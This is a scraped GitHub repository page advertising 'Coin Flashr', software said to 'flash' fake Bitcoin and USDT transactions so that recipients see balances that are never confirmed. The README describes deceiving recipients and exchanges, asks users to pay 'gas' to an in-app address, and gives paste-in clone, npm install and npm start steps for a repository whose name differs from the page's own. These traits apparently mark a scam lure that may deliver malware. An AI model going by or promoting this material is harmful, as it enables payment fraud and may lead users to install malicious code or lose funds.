Skip to content

The only real flashing tool on Github and the internet. Coin Flashr is a USDT flashing software that also allows Bitcoin flashing. Available for Windows, Linux, Mac, android and IOS.

Notifications You must be signed in to change notification settings

flash-bitcoin-software/public-release

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
 
 
 
 
 
 
 
 

Repository files navigation

Description

What is Bitcoin flashing?

Bitcoin flashing is a technique that creates the illusion of a successful Bitcoin transaction, manipulate the receiver's local display to show a fake balance. It is an unconfirmed transaction that will eventually be rejected by the blockchain. This is achieved either by manipulating the transaction signature and the gas fee programatically.

Bitcoin flashing software public release

Coin Flashr is a software application that lets users perform dummy transactions with multiple variants of Bitcoin (including Bitcoin Fantom and Wrapped Bitcoin) and USDT (ERC20, BEP20, and TRC20) in less than a minute. This tool can be used on mobile and PC. We developed this software mainly as a proof-of-concept, and only for demonstration purposes. The setup and utilization is entirely dummyproof. Flash tokens have a limited usage range, and they can not be swapped simply due to a lack of liquidity. The practical use case is transfers between cold and hardware wallets. The bitcoin can be sent to an exchange platform, but confirmation will never happen. Flash tokens are identical to the real deal until the user studies the underlying code or attempt to swap them.

The user will have a limited spendable quota of either Bitcoin or USDT, and is responsible for the gas fee for the flashing transactions. The user will find a gas address in-app and the gas topup process is simple.

Bitcoin flashing mobile app (Android/IOS)

Click here to flash Bitcoin from your mobile phone.

Bitcoin flashing source code

Bitcoin flashing source code is available for instant download as a zip file through curl on the terminal. Details available in-app.

Prerequisites

This application requires Node.js to run.

Windows

Download the Node.js setup application here.

Linux

Run this code in terminal. You may need superuser privileges (sudo).

apt install nodejs

MacOS

Install Homebrew (if you don't have it). Open the terminal and run:

/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"

Once Homebrew is installed, you can install Node.js by running:

brew install node

Git Installation

Before installing Coin Flashr, ensure you have Git installed on your system. Follow the instructions below for your operating system.

Windows

Method 1: Using Winget (Recommended)

winget install Git.Git

Method 2: Using Chocolatey

choco install git

MacOS

Method 1: Using HOmebrew (Recommended)

brew install git

Method 2: Using Macports

sudo port install git

Linux

Ubuntu/Debian

sudo apt update && sudo apt install git

CentOS/RHEL

sudo yum install git

Fedora

sudo dnf install git

Arch Linux

sudo pacman -S git

openSUSE

sudo zypper install git

Verification

After installation, verify Git is installed correctly:

git --version

You should see output similar to: git version 2.x.x

Installation

  1. Clone the repository:
git clone https://github.com/bitcoin-flashing-free/public-release && cd public-release
  1. Install necessary dependencies:
npm install && npm install electron

Usage

npm start

Gas is required for every non-bitcoin (USDT, wBTC) flashing event.

Bitcoin flashing software PC preview

pc-preview.mp4

Bitcoin flashing software iPhone preview

ios-recording.mp4

Community

Stay updated through the official channel for progress tracking and feature updates.

About

The only real flashing tool on Github and the internet. Coin Flashr is a USDT flashing software that also allows Bitcoin flashing. Available for Windows, Linux, Mac, android and IOS.

Topics

Resources

Stars

Watchers

Forks

Contributors